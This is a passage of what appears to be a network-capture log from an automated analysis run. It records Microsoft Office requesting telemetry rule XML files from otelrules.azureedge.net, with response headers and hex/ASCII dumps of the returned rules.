                Content-Type: text/xml
                Content-Length: 1356
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                ETag: "0x8DC582BDC681E17"
                x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48vlsxxpe15ac3q7n00000002sg00000000bpnm
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                90192.168.2.44983813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1395
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                ETag: "0x8DC582BE017CAD3"
                x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48dfrdj7px744zp8s00000002m0000000006czc
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                Session IDSource IPSource PortDestination IPDestination Port
                91192.168.2.44983713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1356
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                ETag: "0x8DC582BDF66E42D"
                x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd482tlqpvyz9e93p5400000002yg000000003h2k
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                92192.168.2.44983913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1358
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                ETag: "0x8DC582BE6431446"
                x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48lknvp09v995n79000000002b000000000qwxx
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                93192.168.2.44984013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1395
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                ETag: "0x8DC582BDE12A98D"
                x-ms-request-id: 03c3f781-101e-000b-56fe-165e5c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48wd55zet5pcra0cg00000002ug000000005t7y
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                Session IDSource IPSource PortDestination IPDestination Port
                94192.168.2.44984113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1358
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                ETag: "0x8DC582BE022ECC5"
                x-ms-request-id: 76165599-601e-000d-1a02-172618000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48xlwdx82gahegw40000000030000000000bgc2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                95192.168.2.44984213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1389
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE10A6BC1"
                x-ms-request-id: 29f28342-e01e-003c-5d00-17c70b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48vhs7r2p1ky7cs5w000000030g00000000raa0
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                Session IDSource IPSource PortDestination IPDestination Port
                96192.168.2.44984313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1352
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                ETag: "0x8DC582BE9DEEE28"
                x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48tqvfc1ysmtbdrg000000002sg0000000001hc
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                Session IDSource IPSource PortDestination IPDestination Port
                97192.168.2.44984413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:00 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:00 GMT
                Content-Type: text/xml
                Content-Length: 1405
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE12B5C71"
                x-ms-request-id: c7b66cba-b01e-005c-04ff-164c66000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012700Z-1657d5bbd4824mj9d6vp65b6n400000002x000000000s85t
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                Session IDSource IPSource PortDestination IPDestination Port
                98192.168.2.44984713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:00 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:00 GMT
                Content-Type: text/xml
                Content-Length: 1364
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE1223606"
                x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012700Z-1657d5bbd487nf59mzf5b3gk8n00000002bg00000000muw8
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                99192.168.2.44984513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:00 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:00 GMT
                Content-Type: text/xml
                Content-Length: 1368
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                ETag: "0x8DC582BDDC22447"
                x-ms-request-id: 173e0f62-801e-00a3-24fe-167cfb000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012700Z-1657d5bbd48sdh4cyzadbb374800000002qg000000005g9m
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:00 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                Session IDSource IPSource PortDestination IPDestination Port
                100192.168.2.44984613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:00 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:00 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:00 GMT
                Content-Type: text/xml
                Content-Length: 1401
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                ETag: "0x8DC582BE055B528"
                x-ms-request-id: 6bee43b5-001e-00a2-2106-17d4d5000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012700Z-1657d5bbd48vlsxxpe15ac3q7n00000002ng00000000tbqn
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
